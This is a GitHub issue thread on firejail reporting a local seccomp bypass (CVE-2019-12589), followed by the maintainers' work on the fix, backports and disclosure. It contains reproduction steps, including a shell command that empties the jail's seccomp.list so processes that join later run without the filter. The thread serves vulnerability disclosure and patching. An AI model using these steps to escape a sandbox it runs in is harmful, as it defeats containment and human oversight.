Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

seccomp bypass when joining existing jail #2718

Closed
apmorton opened this issue May 21, 2019 · 27 comments

Comments

Projects
None yet
8 participants
@apmorton
Copy link
Contributor

commented May 21, 2019

seccomp filters are copied into /run/firejail/mnt, and are writable within the jail.

A malicious process can modify files from inside the jail.
Processes that are later joined to the jail will not have seccomp filters applied.

repro steps

compile program to call blacklisted syscall

gcc -xc - <<EOF
#include <stdio.h>
#include <sys/klog.h>

int main(void) {
    printf("calling syslog syscall\n");
    klogctl(1, NULL, 0);
    printf("not killed\n");
}
EOF

create interactive jail session

$ firejail --quiet --name=jail

try to run program inside jail, noting syscall is blocked

$ ./a.out
calling syslog syscall
Bad system call (core dumped)

open new terminal and run program by joining jail, noting syscall is blocked

$ firejail --quiet --join=jail ./a.out
calling syslog syscall

back in original interactive jail session, empty the seccomp.list file and attempt to run program, noting syscall is blocked

$ echo -n "" > /run/firejail/mnt/seccomp.list
$ ./a.out
calling syslog syscall
Bad system call (core dumped)

open new terminal and run program by joining jail, noting syscall is NOT blocked

$ firejail --quiet --join=jail ./a.out
calling syslog syscall
not killed
@chiraag-nataraj

This comment has been minimized.

Copy link
Collaborator

commented May 21, 2019

echo -n "" > /run/firejail/mnt/seccomp.list

This fails for me with bash: /run/firejail/mnt/seccomp.list: Permission denied. Let me play around a bit, since idk if it's only a "my system" thing.

Which version of firejail are you running? Which distro?

@chiraag-nataraj

This comment has been minimized.

Copy link
Collaborator

commented May 21, 2019

Okay, so I can replicate with current release, but not with current git master. Is that the same for you @apmorton?

@apmorton

This comment has been minimized.

Copy link
Contributor Author

commented May 21, 2019

confirmed, this is fixed on latest master.

seccomp files are put in /run/firejail/mnt/seccomp and is mounted as a read-only filesystem, which mitigates the issue.

@chiraag-nataraj

This comment has been minimized.

Copy link
Collaborator

commented May 21, 2019

In the future, if you think you have found a security vulnerability (which this certainly would qualify as), you should probably follow the directions in the readme (i.e. email netblue30).

@chiraag-nataraj

This comment has been minimized.

Copy link
Collaborator

commented May 21, 2019

@netblue30, this is fixed in git master, but apparently is an issue in the current release. How should we proceed?

@apmorton

This comment has been minimized.

Copy link
Contributor Author

commented May 21, 2019

neither readme (README or README.md) have security disclosure procedures

edit: just noticed in CONTRIBUTING.md, apologies

@chiraag-nataraj

This comment has been minimized.

Copy link
Collaborator

commented May 21, 2019

I'll add it to the README as well, since people might not think to look at CONTRIBUTING.

@chiraag-nataraj

This comment has been minimized.

Copy link
Collaborator

commented May 22, 2019

@apmorton, if you're comfortable, can you bisect the commits to figure out which one solved this? We should probably back-port just that fix...

@smitsohu

This comment has been minimized.

Copy link
Collaborator

commented May 22, 2019

It is commit eecf35c

@chiraag-nataraj

This comment has been minimized.

Copy link
Collaborator

commented May 22, 2019

Thanks @smitsohu! Should we back-port to LTS and current release?

@smitsohu

This comment has been minimized.

Copy link
Collaborator

commented May 22, 2019

@chiraag-nataraj We already have a new release candidate, and 0.9.58 will be replaced very soon anyways.

LTS is a different story, imho it should be backported. What does @startx2017 think?

@SkewedZeppelin

This comment has been minimized.

Copy link
Collaborator

commented May 22, 2019

What about getting a CVE assigned?
And many distros still aren't even shipping 0.9.58.

@smitsohu

This comment has been minimized.

Copy link
Collaborator

commented May 22, 2019

What about getting a CVE assigned?
And many distros still aren't even shipping 0.9.58.

@netblue30 ?

@SkewedZeppelin

This comment has been minimized.

Copy link
Collaborator

commented May 22, 2019

this fine?

Subject: local seccomp bypass in firejail before 0.9.60-rc1

Austin Morton has discovered a local method to bypass/disable seccomp
filters of a firejail sandbox.

Versions of firejail before 0.9.60-rc1 or eecf35c2 do not mark seccomp
files read-only which allows overwriting them, once overwritten any
processes joined to the existing sandbox will not have seccomp enforced.
This can allow for a denial of service or elevation of privileges.

Reported here:
https://github.com/netblue30/firejail/issues/2718

Fixed in this commit:
https://github.com/netblue30/firejail/commit/eecf35c2

Compile tested backports for LTS, 0.9.52, 0.9.54, 0.9.56, and 0.9.58.2 are
available here:
https://github.com/netblue30/firejail/issues/2718#issuecomment-495010478
@smitsohu

This comment has been minimized.

Copy link
Collaborator

commented May 22, 2019

Pending backport to LTS and other versions.

More a side note: So far we as upstream only support the last version and LTS, and I tend to believe this is a wise decision. I'd say for earlier versions it is the maintainers job to backport fixes, in line with their respective distribution policy.

@SkewedZeppelin

This comment has been minimized.

Copy link
Collaborator

commented May 22, 2019

@smitsohu
okay updated, would you like to send it to the oss-security list?

@SkewedZeppelin

This comment has been minimized.

Copy link
Collaborator

commented May 22, 2019

I have done some backports here
https://gist.github.com/SkewedZeppelin/7f67a131a3d31bfa9d64eaf1a72b1971

edit: attached as a zip for archival purposes
eecf35c-backports.zip

@smitsohu

This comment has been minimized.

Copy link
Collaborator

commented May 23, 2019

asked MITRE for a CVE number

@netblue30 netblue30 added the bug label May 26, 2019

@netblue30

This comment has been minimized.

Copy link
Owner

commented May 26, 2019

Thanks @apmorton

New release Monday morning. If you want to bring in any other fix, now is the time. If we don't get a CVE number by Monday, we'll add it later. I'll grab the patch from @SkewedZeppelin and add it in etc-fixes directory here on mainline. For LTS a new release probably sometime next week, there are some more fixes to be added there, I'll have to tak to @startx2017 .

@rusty-snake

This comment has been minimized.

Copy link
Collaborator

commented May 26, 2019

The RELNOTES should be updated, we have some new stuff like private-cwd or deterministic-exit-code and so on.

@netblue30

This comment has been minimized.

Copy link
Owner

commented May 26, 2019

RELNOTES done, anything missing just add it in. I'm doing some testing right now, tonight or tomorrow morning it should be out.

@reinerh

This comment has been minimized.

Copy link
Collaborator

commented May 30, 2019

@smitsohu Was there already a reply regarding CVE number?

Edit: Did you use this form? https://cveform.mitre.org/

@smitsohu

This comment has been minimized.

Copy link
Collaborator

commented May 30, 2019

@reinerh We have no number assigned yet.

Yes, I used the webform. I think I'm going to ask if there is something we can do on our end to speed up the process.

@netblue30

This comment has been minimized.

Copy link
Owner

commented May 30, 2019

@startx2017 started porting, we will have a LTS release by the end of the week with or without CVE.

@reinerh

This comment has been minimized.

Copy link
Collaborator

commented May 30, 2019

(FYI a backported fix is in Debian unstable since yesterday, together with a fix for #2401; and it has been unblocked for migration to Buster.)

@reinerh reinerh added the security label May 31, 2019

@carnil

This comment has been minimized.

Copy link

commented Jun 3, 2019

CVE-2019-12589 was assigned for this issue.

@netblue30

This comment has been minimized.

Copy link
Owner

commented Jun 8, 2019

LTS version also released, CVE status page updated - https://firejail.wordpress.com/download-2/cve-status/

@netblue30 netblue30 closed this Jun 8, 2019

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.